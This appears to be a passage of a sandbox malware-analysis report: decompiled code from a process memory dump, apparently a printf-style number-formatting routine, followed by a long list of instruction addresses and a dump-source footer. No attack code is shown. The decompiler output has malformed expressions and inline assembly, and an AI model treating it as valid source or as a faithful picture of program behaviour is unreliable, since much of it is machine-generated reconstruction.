				_t415 =  >  ? 9 : _t414;
				_v0 = _t415;
				_t223 = _t415;
				asm("movaps xmm1, xmm2");
				_a20 = _t335;
				if(_t415 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						asm("mulsd xmm1, xmm4");
						_t223 = _t223 - 1;
						_t455 = _t223;
					} while (_t455 != 0);
				}
				asm("movsd xmm5, [0x3b1f78]");
				asm("cvttsd2si edx, xmm1");
				asm("movd xmm0, edx");
				asm("cvtdq2pd xmm0, xmm0");
				asm("subsd xmm1, xmm0");
				asm("comisd xmm1, xmm5");
				if(_t455 >= 0) {
					_t372 = _t372 + 1;
				}
				_t224 = _t415;
				if(_t415 != 0) {
					do {
						asm("mulsd xmm2, xmm4");
						_t224 = _t224 - 1;
						_t458 = _t224;
					} while (_t458 != 0);
				}
				asm("movd xmm0, ecx");
				asm("cvtdq2pd xmm0, xmm0");
				asm("subsd xmm3, xmm0");
				asm("mulsd xmm3, xmm2");
				asm("cvttsd2si eax, xmm3");
				_a16 = _t224;
				asm("movd xmm0, eax");
				asm("cvtdq2pd xmm0, xmm0");
				asm("subsd xmm3, xmm0");
				asm("comisd xmm3, xmm5");
				if(_t458 >= 0) {
					_t224 = _t224 + 1;
					_a16 = _t224;
				}
				if(_t224 >= _t372) {
					_t335 = _t335 + 1;
					_a20 = _t335;
					_a16 = _t224 - _t372;
				}
				_t397 = 0;
				do {
					_t416 = _t397;
					_t335 = (0x66666667 * _t335 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t335 >> 0x20 >> 2);
					_a20 = _t335;
					 *((char*)(_t447 + _t397 + 0x40)) =  *((intOrPtr*)(_a20 - _t335 + _t335 * 4 + _t335 + _t335 * 4 + "0123456789"));
					_t397 = _t397 + 1;
				} while (_t335 != 0 && _t397 < 0x14);
				_t417 =  !=  ? _t397 : _t416;
				_a20 = _t417;
				if(_t417 >= 0x14) {
					L58:
					E002E0994();
					asm("int3");
					E00397C10();
					_t232 =  *0x3e1008; // 0x847b54ee
					_a56 = _t232 ^ _t447;
					_t377 = _a84;
					_a16 = _a68;
					_v4 = _a72;
					_v8 = _a76;
					_t237 = _a96;
					__eflags = _t237;
					_t339 =  >=  ? _t237 : 0;
					_push(_t417);
					_a24 =  >=  ? _t237 : 0;
					_t340 = _a100;
					_a20 = _a64;
					_v0 = 0;
					_a4 = 0x3dce2e;
					_push(_t397);
					__eflags = _t340 & 0x00000040;
					if((_t340 & 0x00000040) != 0) {
						L67:
						_t323 = _a80;
					} else {
						__eflags = _t377;
						if(__eflags > 0) {
							L64:
							__eflags = _t340 & 0x00000002;
							if((_t340 & 0x00000002) == 0) {
								__eflags = _t340 & 0x00000004;
								_t333 =  !=  ? 0x20 : 0;
								_v0 =  !=  ? 0x20 : 0;
							} else {
								_v0 = 0x2b;
							}
							goto L67;
						} else {
							if(__eflags < 0) {
								L63:
								_t323 =  ~_a80;
								_v0 = 0x2d;
								asm("adc edx, 0x0");
								_t377 =  ~_t377;
							} else {
								__eflags = _a80;
								if(_a80 >= 0) {
									goto L64;
								} else {
									goto L63;
								}
							}
						}
					}
					_t398 = _a88;
					__eflags = _t340 & 0x00000008;
					if((_t340 & 0x00000008) != 0) {
						__eflags = _t398 - 8;
						_t284 =  ==  ? 0x3dd5c0 : 0x3dce2e;
						__eflags = _t398 - 0x10;
						_t432 =  !=  ?  ==  ? 0x3dd5c0 : 0x3dce2e : "0x";
						_a4 =  !=  ?  ==  ? 0x3dd5c0 : 0x3dce2e : "0x";
					}
					_t341 = "0123456789abcdef";
					_t241 =  ==  ? _t341 : "0123456789ABCDEF";
					_t419 = 0;
					__eflags = 0;
					_t440 =  ==  ? _t341 : "0123456789ABCDEF";
					while(1) {
						_t399 = _t419;
						_t242 = E00397C70(_t323, _t377, _a88, 0);
						_v4 = _t323;
						_t323 = _t242;
						_t341 = _t341[_t440];
						 *(_t447 + _t419 + 0x34) = _t341;
						_t419 = _t419 + 1;
						__eflags = _t242 | _t377;
						if((_t242 | _t377) == 0) {
							break;
						}
						__eflags = _t419 - 0x1a;
						if(_t419 < 0x1a) {
							continue;
						}
						break;
					}
					_t441 = _a20;
					__eflags = _t419 - 0x1a;
					_t400 =  !=  ? _t419 : _t399;
					_t420 = _a4;
					__eflags = _t400 - 0x1a;
					if(_t400 >= 0x1a) {
						E002E0994();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t245 = _v4;
						_push(_t323);
						_push(_t441);
						_push(_t420);
						_t421 = 0;
						__eflags = _t245;
						_push(_t400);
						_t325 =  !=  ? _t245 : "<NULL>";
						_t342 = _t325;
						_t378 = _t342 + 1;
						do {
							_t246 =  *_t342;
							_t342 = _t342 + 1;
							__eflags = _t246;
						} while (_t246 != 0);
						_t343 = _t342 - _t378;
						__eflags = _t343 - 0x7fffffff;
						_t344 =  >  ? 0x7fffffff : _t343;
						_t248 = _a4;
						_t380 = _t248 - ( >  ? 0x7fffffff : _t343);
						__eflags = _t248;
						if(_t248 < 0) {
							L105:
							_t380 = 0;
							__eflags = 0;
						} else {
							__eflags = _t380;
							if(_t380 < 0) {
								goto L105;
							}
						}
						_t442 = _a8;
						_t345 = _v8;
						_t403 =  ==  ? _t380 :  ~_t380;
						_t381 = _v12;
						__eflags = _t403;
						if(_t403 <= 0) {
							L110:
							__eflags =  *_t325;
							if( *_t325 == 0) {
								L114:
								__eflags = _t403;
								if(_t403 >= 0) {
									L119:
									return 1;
								} else {
									_t327 = _v8;
									while(1) {
										__eflags = _t421 - _t442;
										if(_t421 >= _t442) {
											goto L119;
										}
										_t252 = E002F63F0(_v20, _v16, _v12, _t327, 0x20);
										_t447 = _t447 + 0x14;
										__eflags = _t252;
										if(_t252 == 0) {
											goto L120;
										} else {
											_t421 = _t421 + 1;
											_t403 = _t403 + 1;
											__eflags = _t403;
											if(_t403 < 0) {
												continue;
											} else {
												goto L119;
											}
										}
										goto L121;
									}
									goto L119;
								}
							} else {
								while(1) {
									__eflags = _t421 - _t442;
									if(_t421 >= _t442) {
										goto L114;
									}
									_t255 = E002F63F0(_v20, _v16, _t381, _t345,  *_t325);
									_t447 = _t447 + 0x14;
									_t325 = _t325 + 1;
									__eflags = _t255;
									if(_t255 == 0) {
										goto L120;
									} else {
										_t345 = _v8;
										_t421 = _t421 + 1;
										__eflags =  *_t325;
										_t381 = _v12;
										if( *_t325 != 0) {
											continue;
										} else {
											goto L114;
										}
									}
									goto L121;
								}
								goto L114;
							}
						} else {
							while(1) {
								__eflags = _t421 - _t442;
								if(_t421 >= _t442) {
									goto L110;
								}
								_t256 = E002F63F0(_v20, _v16, _t381, _t345, 0x20);
								_t447 = _t447 + 0x14;
								__eflags = _t256;
								if(_t256 == 0) {
									L120:
									__eflags = 0;
									return 0;
								} else {
									_t345 = _v8;
									_t403 = _t403 - 1;
									_t381 = _v12;
									_t421 = _t421 + 1;
									__eflags = _t403;
									if(_t403 > 0) {
										continue;
									} else {
										goto L110;
									}
								}
								goto L121;
							}
							goto L110;
						}
					} else {
						_t346 = _a24;
						_t329 = _t420 + 1;
						 *((char*)(_t447 + _t400 + 0x34)) = 0;
						_t383 = _t346 - _t400;
						__eflags = _t383;
						do {
							_t257 =  *_t420;
							_t420 = _t420 + 1;
							__eflags = _t257;
						} while (_t257 != 0);
						__eflags = _t346 - _t400;
						_t259 =  >=  ? _t346 : _t400;
						_t348 = _a92 - ( >=  ? _t346 : _t400);
						__eflags = _v0;
						_t349 = _a92 - ( >=  ? _t346 : _t400) - (_v0 != 0);
						__eflags = _t383;
						_t263 =  >=  ? _t383 : 0;
						_a8 = _t263;
						_t385 =  >=  ? _a92 - ( >=  ? _t346 : _t400) - (_v0 != 0) - _t420 - _t329 : 0;
						_t351 = _a100;
						__eflags = _t351 & 0x00000010;
						if((_t351 & 0x00000010) != 0) {
							__eflags = _t263 - _t385;
							_t386 =  >=  ? _t263 : _t385;
							_a8 =  >=  ? _t263 : _t385;
							_t385 = 0;
							__eflags = 0;
						}
						_t330 = _a16;
						_t427 =  ==  ? _t385 :  ~_t385;
						__eflags = _t427;
						if(_t427 <= 0) {
							L82:
							_t264 = _v0;
							__eflags = _t264;
							if(_t264 == 0) {
								L84:
								_t266 =  *_a4;
								__eflags = _t266;
								if(_t266 == 0) {
									L88:
									__eflags = _a8;
									if(_a8 <= 0) {
										L91:
										__eflags = _t400;
										if(_t400 <= 0) {
											L95:
											__eflags = _t427;
											if(_t427 >= 0) {
												L98:
												_pop(_t428);
												__eflags = _a56 ^ _t447;
												return E002E056D(_a56 ^ _t447, _t385, _t428);
											} else {
												while(1) {
													_t269 = E002F63F0(_t441, _t330, _v4, _v8, 0x20);
													_t447 = _t447 + 0x14;
													__eflags = _t269;
													if(_t269 == 0) {
														goto L99;
													}
													_t427 = _t427 + 1;
													__eflags = _t427;
													if(_t427 < 0) {
														continue;
													} else {
														goto L98;
													}
													goto L121;
												}
												goto L99;
											}
										} else {
											while(1) {
												_t272 =  *((char*)(_t447 + _t400 + 0x33));
												_t400 = _t400 - 1;
												_t273 = E002F63F0(_t441, _t330, _v4, _v8, _t272);
												_t447 = _t447 + 0x14;
												__eflags = _t273;
												if(_t273 == 0) {
													goto L99;
												}
												__eflags = _t400;
												if(_t400 > 0) {
													continue;
												} else {
													goto L95;
												}
												goto L121;
											}
											goto L99;
										}
									} else {
										while(1) {
											_t274 = E002F63F0(_t441, _t330, _v4, _v8, 0x30);
											_t447 = _t447 + 0x14;
											__eflags = _t274;
											if(_t274 == 0) {
												goto L99;
											}
											_t276 = _a8 - 1;
											_a8 = _t276;
											__eflags = _t276;
											if(_t276 > 0) {
												continue;
											} else {
												goto L91;
											}
											goto L121;
										}
										goto L99;
									}
								} else {
									while(1) {
										_t278 = E002F63F0(_t441, _t330, _v4, _v8, _t266);
										_t447 = _t447 + 0x14;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L99;
										}
										_t280 = _a4 + 1;
										_a4 = _t280;
										_t266 =  *_t280;
										__eflags = _t266;
										if(_t266 != 0) {
											continue;
										} else {
											goto L88;
										}
										goto L121;
									}
									goto L99;
								}
							} else {
								_t281 = E002F63F0(_t441, _t330, _v4, _v8, _t264);
								_t447 = _t447 + 0x14;
								__eflags = _t281;
								if(_t281 == 0) {
									goto L99;
								} else {
									goto L84;
								}
							}
						} else {
							while(1) {
								_t282 = E002F63F0(_t441, _t330, _v4, _v8, 0x20);
								_t447 = _t447 + 0x14;
								__eflags = _t282;
								if(_t282 == 0) {
									break;
								}
								_t427 = _t427 - 1;
								__eflags = _t427;
								if(_t427 > 0) {
									continue;
								} else {
									goto L82;
								}
								goto L121;
							}
							L99:
							_pop(_t429);
							__eflags = _a56 ^ _t447;
							return E002E056D(_a56 ^ _t447, _t385, _t429);
						}
					}
				} else {
					_t408 = _a16;
					_t387 = 0;
					 *((char*)(_t447 + _t417 + 0x40)) = 0;
					do {
						_t433 = _t387;
						_t359 = (0x66666667 * _t408 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t408 >> 0x20 >> 2);
						_t390 = _a8;
						_t409 = _t408 - _t359 + _t359 * 4 + _t359 + _t359 * 4;
						_t408 = _t359;
						 *((char*)(_t447 + _t390 + 0x2c)) =  *((intOrPtr*)(_t409 + "0123456789"));
						_t387 = _t390 + 1;
						_a8 = _t387;
					} while (_t387 < _v0);
					_t397 = _a4;
					_t417 =  !=  ? _t387 : _t433;
					_a16 = _t417;
					if(_t417 >= 0x14) {
						goto L58;
					} else {
						 *((char*)(_t447 + _t417 + 0x2c)) = 0;
						_t293 = _v0;
						_t392 =  >=  ? _t293 - _t417 : 0;
						_a8 =  >=  ? _t293 - _t417 : 0;
						_t394 =  >=  ? _a108 - (_a12 != 0) - _a20 - _t293 + 0xffffffff : 0;
						_t367 =  ==  ?  >=  ? _a108 - (_a12 != 0) - _a20 - _t293 + 0xffffffff : 0 :  ~( >=  ? _a108 - (_a12 != 0) - _a20 - _t293 + 0xffffffff : 0);
						_a4 = _t367;
						_t434 = _t367;
						if((_a116 & 0x00000010) == 0 || _t367 <= 0) {
							__eflags = _t434;
							if(_t434 <= 0) {
								goto L38;
							} else {
								while(1) {
									_t316 = E002F63F0(_t397, _a24, _a28, _a32, 0x20);
									_t447 = _t447 + 0x14;
									__eflags = _t316;
									if(_t316 == 0) {
										goto L28;
									}
									_t434 = _t434 - 1;
									__eflags = _t434;
									if(_t434 > 0) {
										continue;
									} else {
										goto L38;
									}
									goto L121;
								}
								goto L28;
							}
						} else {
							_t317 = _a12;
							if(_a12 == 0) {
								L30:
								__eflags = _t434;
								if(_t434 <= 0) {
									L38:
									_t297 = _a12;
									__eflags = _t297;
									if(_t297 == 0) {
										L40:
										_t298 = _a20;
										__eflags = _t298;
										if(_t298 <= 0) {
											L43:
											__eflags = _v0;
											if(_v0 > 0) {
												L45:
												_t299 = E002F63F0(_t397, _a24, _a28, _a32, 0x2e);
												_t447 = _t447 + 0x14;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L28;
												} else {
													_t302 = _a16;
													__eflags = _t302;
													if(_t302 <= 0) {
														goto L50;
													} else {
														while(1) {
															_a16 = _t302 - 1;
															_t311 = E002F63F0(_t397, _a24, _a28, _a32,  *((char*)(_t447 + _t302 - 1 + 0x2c)));
															_t447 = _t447 + 0x14;
															__eflags = _t311;
															if(_t311 == 0) {
																goto L28;
															}
															_t302 = _a16;
															__eflags = _t302;
															if(_t302 > 0) {
																continue;
															} else {
																goto L50;
															}
															goto L121;
														}
														goto L28;
													}
												}
											} else {
												__eflags = _a116 & 0x00000008;
												if((_a116 & 0x00000008) == 0) {
													L50:
													__eflags = _a8;
													if(_a8 <= 0) {
														L54:
														__eflags = _t434;
														if(_t434 >= 0) {
															L57:
															_pop(_t436);
															__eflags = _a76 ^ _t447;
															return E002E056D(_a76 ^ _t447, _t394, _t436);
														} else {
															while(1) {
																_t305 = E002F63F0(_t397, _a24, _a28, _a32, 0x20);
																_t447 = _t447 + 0x14;
																__eflags = _t305;
																if(_t305 == 0) {
																	goto L28;
																}
																_t434 = _t434 + 1;
																__eflags = _t434;
																if(_t434 < 0) {
																	continue;
																} else {
																	goto L57;
																}
																goto L121;
															}
															goto L28;
														}
													} else {
														asm("o16 nop [eax+eax]");
														while(1) {
															_t306 = E002F63F0(_t397, _a24, _a28, _a32, 0x30);
															_t447 = _t447 + 0x14;
															__eflags = _t306;
															if(_t306 == 0) {
																goto L28;
															}
															_t308 = _a8 - 1;
															_a8 = _t308;
															__eflags = _t308;
															if(_t308 > 0) {
																continue;
															} else {
																goto L54;
															}
															goto L121;
														}
														goto L28;
													}
												} else {
													goto L45;
												}
											}
										} else {
											while(1) {
												_a20 = _t298 - 1;
												_t314 = E002F63F0(_t397, _a24, _a28, _a32,  *((char*)(_t447 + _t298 - 1 + 0x40)));
												_t447 = _t447 + 0x14;
												__eflags = _t314;
												if(_t314 == 0) {
													goto L28;
												}
												_t298 = _a20;
												__eflags = _t298;
												if(_t298 > 0) {
													continue;
												} else {
													goto L43;
												}
												goto L121;
											}
											goto L28;
										}
									} else {
										_t315 = E002F63F0(_t397, _a24, _a28, _a32, _t297);
										_t447 = _t447 + 0x14;
										__eflags = _t315;
										if(_t315 == 0) {
											goto L28;
										} else {
											goto L40;
										}
									}
								} else {
									while(1) {
										_t318 = E002F63F0(_t397, _a24, _a28, _a32, 0x30);
										_t447 = _t447 + 0x14;
										__eflags = _t318;
										if(_t318 == 0) {
											goto L28;
										}
										_t434 = _t434 - 1;
										__eflags = _t434;
										if(_t434 > 0) {
											continue;
										} else {
											goto L38;
										}
										goto L121;
									}
									goto L28;
								}
							} else {
								_t319 = E002F63F0(_t397, _a24, _a28, _a32, _t317);
								_t447 = _t447 + 0x14;
								if(_t319 != 0) {
									_t434 = _a4 - 1;
									__eflags = _t434;
									_a12 = 0;
									goto L30;
								} else {
									L28:
									_pop(_t435);
									return E002E056D(_a76 ^ _t447, _t394, _t435);
								}
							}
						}
					}
				}
				L121:
			}






































































































                        0x002f64b0
                        0x002f64b5
                        0x002f64ba
                        0x002f64c1
                        0x002f64c9
                        0x002f64cb
                        0x002f64d1
                        0x002f64d4
                        0x002f64dc
                        0x002f64e4
                        0x002f64e8
                        0x002f64f4
                        0x002f64f8
                        0x002f64fb
                        0x002f64ff
                        0x002f6508
                        0x002f650c
                        0x002f651f
                        0x002f6521
                        0x002f652d
                        0x002f6534
                        0x002f6537
                        0x002f6523
                        0x002f6523
                        0x002f6523
                        0x002f650e
                        0x002f650e
                        0x002f6515
                        0x002f6515
                        0x002f653b
                        0x002f6548
                        0x002f6552
                        0x002f6556
                        0x002f6559
                        0x002f655d
                        0x002f655f
                        0x002f6562
                        0x002f6568
                        0x002f656a
                        0x002f6570
                        0x002f6570
                        0x002f6574
                        0x002f6574
                        0x002f6574
                        0x002f6570
                        0x002f6579
                        0x002f6581
                        0x002f6585
                        0x002f6589
                        0x002f658d
                        0x002f6591
                        0x002f6595
                        0x002f6597
                        0x002f6597
                        0x002f6598
                        0x002f659c
                        0x002f65a0
                        0x002f65a0
                        0x002f65a4
                        0x002f65a4
                        0x002f65a4
                        0x002f65a0
                        0x002f65a9
                        0x002f65ad
                        0x002f65b1
                        0x002f65b5
                        0x002f65b9
                        0x002f65bd
                        0x002f65c1
                        0x002f65c5
                        0x002f65c9
                        0x002f65cd
                        0x002f65d1
                        0x002f65d3
                        0x002f65d4
                        0x002f65d4
                        0x002f65da
                        0x002f65dc
                        0x002f65df
                        0x002f65e3
                        0x002f65e3
                        0x002f65e7
                        0x002f65f0
                        0x002f65f5
                        0x002f6601
                        0x002f6607
                        0x002f6618
                        0x002f661c
                        0x002f661d
                        0x002f6629
                        0x002f662c
                        0x002f6633
                        0x002f68ba
                        0x002f68ba
                        0x002f68bf
                        0x002f68c5
                        0x002f68ca
                        0x002f68d1
                        0x002f68db
                        0x002f68df
                        0x002f68e8
                        0x002f68f2
                        0x002f68f6
                        0x002f68fa
                        0x002f6901
                        0x002f6904
                        0x002f6905
                        0x002f690e
                        0x002f6912
                        0x002f6916
                        0x002f691a
                        0x002f691e
                        0x002f691f
                        0x002f6922
                        0x002f6963
                        0x002f6963
                        0x002f6924
                        0x002f6924
                        0x002f6926
                        0x002f6945
                        0x002f6945
                        0x002f6948
                        0x002f6954
                        0x002f695c
                        0x002f695f
                        0x002f694a
                        0x002f694a
                        0x002f694a
                        0x00000000
                        0x002f6928
                        0x002f6928
                        0x002f6930
                        0x002f6934
                        0x002f6936
                        0x002f693e
                        0x002f6941
                        0x002f692a
                        0x002f692a
                        0x002f692e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f692e
                        0x002f6928
                        0x002f6926
                        0x002f6967
                        0x002f696b
                        0x002f696e
                        0x002f6970
                        0x002f697d
                        0x002f6980
                        0x002f6988
                        0x002f698b
                        0x002f698b
                        0x002f6991
                        0x002f699e
                        0x002f69a1
                        0x002f69a1
                        0x002f69a3
                        0x002f69a5
                        0x002f69ab
                        0x002f69af
                        0x002f69b4
                        0x002f69b8
                        0x002f69ba
                        0x002f69bd
                        0x002f69c1
                        0x002f69c2
                        0x002f69c4
                        0x00000000
                        0x00000000
                        0x002f69c6
                        0x002f69c9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f69c9
                        0x002f69cb
                        0x002f69cf
                        0x002f69d2
                        0x002f69d5
                        0x002f69d9
                        0x002f69dc
                        0x002f6b6f
                        0x002f6b74
                        0x002f6b75
                        0x002f6b76
                        0x002f6b77
                        0x002f6b78
                        0x002f6b79
                        0x002f6b7a
                        0x002f6b7b
                        0x002f6b7c
                        0x002f6b7d
                        0x002f6b7e
                        0x002f6b7f
                        0x002f6b80
                        0x002f6b84
                        0x002f6b85
                        0x002f6b86
                        0x002f6b87
                        0x002f6b8e
                        0x002f6b90
                        0x002f6b91
                        0x002f6b94
                        0x002f6b96
                        0x002f6ba0
                        0x002f6ba0
                        0x002f6ba2
                        0x002f6ba3
                        0x002f6ba3
                        0x002f6ba7
                        0x002f6bae
                        0x002f6bb0
                        0x002f6bb3
                        0x002f6bb9
                        0x002f6bbb
                        0x002f6bbd
                        0x002f6bc3
                        0x002f6bc3
                        0x002f6bc3
                        0x002f6bbf
                        0x002f6bbf
                        0x002f6bc1
                        0x00000000
                        0x00000000
                        0x002f6bc1
                        0x002f6bcb
                        0x002f6bd1
                        0x002f6bd7
                        0x002f6bda
                        0x002f6bde
                        0x002f6be0
                        0x002f6c0c
                        0x002f6c0c
                        0x002f6c0f
                        0x002f6c3e
                        0x002f6c3e
                        0x002f6c40
                        0x002f6c6b
                        0x002f6c74
                        0x002f6c42
                        0x002f6c42
                        0x002f6c46
                        0x002f6c46
                        0x002f6c48
                        0x00000000
                        0x00000000
                        0x002f6c59
                        0x002f6c5e
                        0x002f6c61
                        0x002f6c63
                        0x00000000
                        0x002f6c65
                        0x002f6c65
                        0x002f6c66
                        0x002f6c66
                        0x002f6c69
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6c69
                        0x00000000
                        0x002f6c63
                        0x00000000
                        0x002f6c46
                        0x002f6c11
                        0x002f6c11
                        0x002f6c11
                        0x002f6c13
                        0x00000000
                        0x00000000
                        0x002f6c23
                        0x002f6c28
                        0x002f6c2b
                        0x002f6c2c
                        0x002f6c2e
                        0x00000000
                        0x002f6c30
                        0x002f6c30
                        0x002f6c34
                        0x002f6c35
                        0x002f6c38
                        0x002f6c3c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6c3c
                        0x00000000
                        0x002f6c2e
                        0x00000000
                        0x002f6c11
                        0x002f6be2
                        0x002f6be2
                        0x002f6be2
                        0x002f6be4
                        0x00000000
                        0x00000000
                        0x002f6bf2
                        0x002f6bf7
                        0x002f6bfa
                        0x002f6bfc
                        0x002f6c75
                        0x002f6c78
                        0x002f6c7b
                        0x002f6bfe
                        0x002f6bfe
                        0x002f6c02
                        0x002f6c03
                        0x002f6c07
                        0x002f6c08
                        0x002f6c0a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6c0a
                        0x00000000
                        0x002f6bfc
                        0x00000000
                        0x002f6be2
                        0x002f69e2
                        0x002f69e2
                        0x002f69e6
                        0x002f69eb
                        0x002f69f0
                        0x002f69f0
                        0x002f69f2
                        0x002f69f2
                        0x002f69f4
                        0x002f69f5
                        0x002f69f5
                        0x002f69fd
                        0x002f69ff
                        0x002f6a06
                        0x002f6a0a
                        0x002f6a11
                        0x002f6a15
                        0x002f6a17
                        0x002f6a1e
                        0x002f6a22
                        0x002f6a25
                        0x002f6a29
                        0x002f6a2c
                        0x002f6a2e
                        0x002f6a30
                        0x002f6a33
                        0x002f6a37
                        0x002f6a37
                        0x002f6a37
                        0x002f6a39
                        0x002f6a44
                        0x002f6a47
                        0x002f6a49
                        0x002f6a71
                        0x002f6a71
                        0x002f6a75
                        0x002f6a77
                        0x002f6a94
                        0x002f6a98
                        0x002f6a9a
                        0x002f6a9c
                        0x002f6acd
                        0x002f6acd
                        0x002f6ad2
                        0x002f6af9
                        0x002f6af9
                        0x002f6afb
                        0x002f6b21
                        0x002f6b21
                        0x002f6b23
                        0x002f6b42
                        0x002f6b43
                        0x002f6b4f
                        0x002f6b59
                        0x002f6b25
                        0x002f6b25
                        0x002f6b31
                        0x002f6b36
                        0x002f6b39
                        0x002f6b3b
                        0x00000000
                        0x00000000
                        0x002f6b3d
                        0x002f6b3d
                        0x002f6b40
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6b40
                        0x00000000
                        0x002f6b25
                        0x002f6b00
                        0x002f6b00
                        0x002f6b00
                        0x002f6b05
                        0x002f6b11
                        0x002f6b16
                        0x002f6b19
                        0x002f6b1b
                        0x00000000
                        0x00000000
                        0x002f6b1d
                        0x002f6b1f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6b1f
                        0x00000000
                        0x002f6b00
                        0x002f6ad4
                        0x002f6ad4
                        0x002f6ae0
                        0x002f6ae5
                        0x002f6ae8
                        0x002f6aea
                        0x00000000
                        0x00000000
                        0x002f6af0
                        0x002f6af1
                        0x002f6af5
                        0x002f6af7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6af7
                        0x00000000
                        0x002f6ad4
                        0x002f6aa0
                        0x002f6aa0
                        0x002f6aae
                        0x002f6ab3
                        0x002f6ab6
                        0x002f6ab8
                        0x00000000
                        0x00000000
                        0x002f6ac2
                        0x002f6ac3
                        0x002f6ac7
                        0x002f6ac9
                        0x002f6acb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6acb
                        0x00000000
                        0x002f6aa0
                        0x002f6a79
                        0x002f6a84
                        0x002f6a89
                        0x002f6a8c
                        0x002f6a8e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6a8e
                        0x002f6a50
                        0x002f6a50
                        0x002f6a5c
                        0x002f6a61
                        0x002f6a64
                        0x002f6a66
                        0x00000000
                        0x00000000
                        0x002f6a6c
                        0x002f6a6d
                        0x002f6a6f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6a6f
                        0x002f6b5a
                        0x002f6b61
                        0x002f6b64
                        0x002f6b6e
                        0x002f6b6e
                        0x002f6a49
                        0x002f6639
                        0x002f6639
                        0x002f663d
                        0x002f663f
                        0x002f6644
                        0x002f6644
                        0x002f6655
                        0x002f6657
                        0x002f6660
                        0x002f6668
                        0x002f666a
                        0x002f666e
                        0x002f666f
                        0x002f6673
                        0x002f6679
                        0x002f6680
                        0x002f6683
                        0x002f668a
                        0x00000000
                        0x002f6690
                        0x002f669f
                        0x002f66a9
                        0x002f66b5
                        0x002f66bc
                        0x002f66c5
                        0x002f66ce
                        0x002f66d6
                        0x002f66da
                        0x002f66dc
                        0x002f6752
                        0x002f6754
                        0x00000000
                        0x002f6756
                        0x002f6756
                        0x002f6765
                        0x002f676a
                        0x002f676d
                        0x002f676f
                        0x00000000
                        0x00000000
                        0x002f6771
                        0x002f6772
                        0x002f6774
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6774
                        0x00000000
                        0x002f6756
                        0x002f66e2
                        0x002f66e2
                        0x002f66e8
                        0x002f6724
                        0x002f6724
                        0x002f6726
                        0x002f6776
                        0x002f6776
                        0x002f677a
                        0x002f677c
                        0x002f679c
                        0x002f679c
                        0x002f67a0
                        0x002f67a2
                        0x002f67d4
                        0x002f67d4
                        0x002f67d9
                        0x002f67e2
                        0x002f67f1
                        0x002f67f6
                        0x002f67f9
                        0x002f67fb
                        0x00000000
                        0x002f6801
                        0x002f6801
                        0x002f6805
                        0x002f6807
                        0x00000000
                        0x002f6810
                        0x002f6810
                        0x002f6811
                        0x002f6828
                        0x002f682d
                        0x002f6830
                        0x002f6832
                        0x00000000
                        0x00000000
                        0x002f6838
                        0x002f683c
                        0x002f683e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f683e
                        0x00000000
                        0x002f6810
                        0x002f6807
                        0x002f67db
                        0x002f67db
                        0x002f67e0
                        0x002f6840
                        0x002f6840
                        0x002f6845
                        0x002f687c
                        0x002f687c
                        0x002f687e
                        0x002f68a4
                        0x002f68ae
                        0x002f68af
                        0x002f68b9
                        0x002f6880
                        0x002f6880
                        0x002f688f
                        0x002f6894
                        0x002f6897
                        0x002f6899
                        0x00000000
                        0x00000000
                        0x002f689f
                        0x002f689f
                        0x002f68a2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f68a2
                        0x00000000
                        0x002f6880
                        0x002f6847
                        0x002f6847
                        0x002f6850
                        0x002f685f
                        0x002f6864
                        0x002f6867
                        0x002f6869
                        0x00000000
                        0x00000000
                        0x002f6873
                        0x002f6874
                        0x002f6878
                        0x002f687a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f687a
                        0x00000000
                        0x002f6850
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f67e0
                        0x002f67a4
                        0x002f67a4
                        0x002f67a5
                        0x002f67bc
                        0x002f67c1
                        0x002f67c4
                        0x002f67c6
                        0x00000000
                        0x00000000
                        0x002f67cc
                        0x002f67d0
                        0x002f67d2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f67d2
                        0x00000000
                        0x002f67a4
                        0x002f677e
                        0x002f678c
                        0x002f6791
                        0x002f6794
                        0x002f6796
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f6796
                        0x002f6730
                        0x002f6730
                        0x002f673f
                        0x002f6744
                        0x002f6747
                        0x002f6749
                        0x00000000
                        0x00000000
                        0x002f674b
                        0x002f674c
                        0x002f674e
                        0x00000000
                        0x002f6750
                        0x00000000
                        0x002f6750
                        0x00000000
                        0x002f674e
                        0x00000000
                        0x002f6730
                        0x002f66ea
                        0x002f66f8
                        0x002f66fd
                        0x002f6702
                        0x002f671b
                        0x002f671b
                        0x002f671c
                        0x00000000
                        0x002f6704
                        0x002f6704
                        0x002f6707
                        0x002f6716
                        0x002f6716
                        0x002f6702
                        0x002f66e8
                        0x002f66dc
                        0x002f668a
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
